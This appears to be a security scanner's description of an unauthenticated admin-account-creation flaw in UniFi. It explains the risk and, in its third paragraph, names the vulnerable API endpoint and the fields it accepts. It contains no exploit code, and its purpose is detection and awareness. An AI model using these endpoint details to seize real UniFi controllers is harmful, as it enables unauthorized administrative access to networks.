UniFi Unauthenticated Admin Account Creation Scanner

UniFi is a platform utilized by network administrators and IT professionals for managing Wi-Fi and network settings. It is commonly found in small to medium-sized businesses as well as home offices. Its capabilities allow centralized management of multiple network devices. UniFi simplifies the provisioning and configuration of network devices. The user-friendly interface of the platform makes it accessible even for those with limited technical skills. Moreover, its comprehensive features make it a popular choice for managing both wired and wireless networks.

The vulnerability detected, Unauthenticated Admin Account Creation, occurs when a system allows the creation of an administrator account without proper authentication. This vulnerability poses a significant security risk as it can be exploited by attackers to gain unauthorized administrative control. It is crucial for systems to enforce authentication protocols to prevent unauthorized access. This type of vulnerability may lead to unauthorized data access and modifications. Moreover, it can potentially result in the loss of sensitive information and system integrity. Proper security measures are essential to protect systems against such vulnerabilities.

The vulnerability in this case specifically relates to the endpoint /api/v1/user_assets/nfc on the UniFi platform. This endpoint accepts POST requests without requiring authentication or session validation. Such requests can include data like alias, asset_id, nfc_id, and tokens. When a request is processed successfully, the system returns a confirmation code over HTTP. This indicates that backend processing occurs without verifying the identity of the requestor. Such a lack of authentication can be a significant security loophole, facilitating unauthorized access and exploitation.

If exploited by malicious individuals, the vulnerability could lead to the unauthorized creation of admin accounts. Once an attacker gains administrative access, they can modify system configurations, access sensitive data, and introduce additional vulnerabilities. The consequences of such unauthorized access can be severe, including data breaches and potential financial losses. Furthermore, compromised systems may be used to launch further attacks or distribute malware. It's crucial to mitigate such vulnerabilities to safeguard both the system and any data it handles.

REFERENCES

• https://www.catchify.sa/post/cve-2025-52665-rce-in-unifi-os-25-000